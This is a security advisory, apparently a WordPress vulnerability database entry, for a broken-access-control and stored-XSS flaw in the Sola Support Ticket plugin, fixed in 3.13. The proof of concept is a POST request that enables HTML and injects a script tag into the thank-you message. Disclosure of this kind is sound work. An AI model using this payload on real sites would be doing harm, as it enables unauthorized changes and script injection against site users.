Sola Support Ticket <= 3.12 – XSS & Configuration Change | CVE 2016-11012 | Plugin Vulnerabilities

Description

Any logged in user with any role and access to wp-admin in any way can update plugin settings including allowing HTML to be parsed. One can also change any notification messages to include JS which then can be used to obtain information by forgery.

Proof of Concept

Make POST request to /wp-admin with parameters

sola_st_save_settings:1
sola_st_settings_allow_html:1
sola_st_settings_thank_you_text:<script>alert(1);</script>

Affects Plugins

sola-support-tickets

Fixed in 3.13

References

CVE

URL

https://plugins.trac.wordpress.org/changeset?old_path=%2Fsola-support-tickets%2Ftags%2F3.12&old=1350554&new_path=%2Fsola-support-tickets%2Ftags%2F3.13&new=1350554&sfp_email=&sfph_mail=

Miscellaneous

Submitter

Justin Greer

Submitter website

http://justin-greer.com

Submitter twitter

justingreer2014

Verified

No

WPVDB ID

5a1143ff-65b0-404f-be63-86b3e5d775df

Timeline

Publicly Published

2016-01-28 (about 8 years ago)

Added

2016-02-14 (about 8 years ago)

Last Updated

2020-09-22 (about 3 years ago)

Other

Published

Title

Published

2014-11-24

Title

DukaPress <= 2.5.3 - Unauthenticated Path Traversal

Published

2014-11-04

Title

WP DB Backup < 2.3.0 - Backup Filename Brute Forcing

Published

2018-11-12

Title

Social Sharing Plugin - Kiwi < 2.0.11 - Arbitrary WordPress Options Update

Published

2015-07-13

Title

CP Image Store with Slideshow <= 1.0.6 - Purchase ID Brute Force Prevention

Published

2022-10-21

Title

Quiz And Survey Master < 7.3.11 - Bypass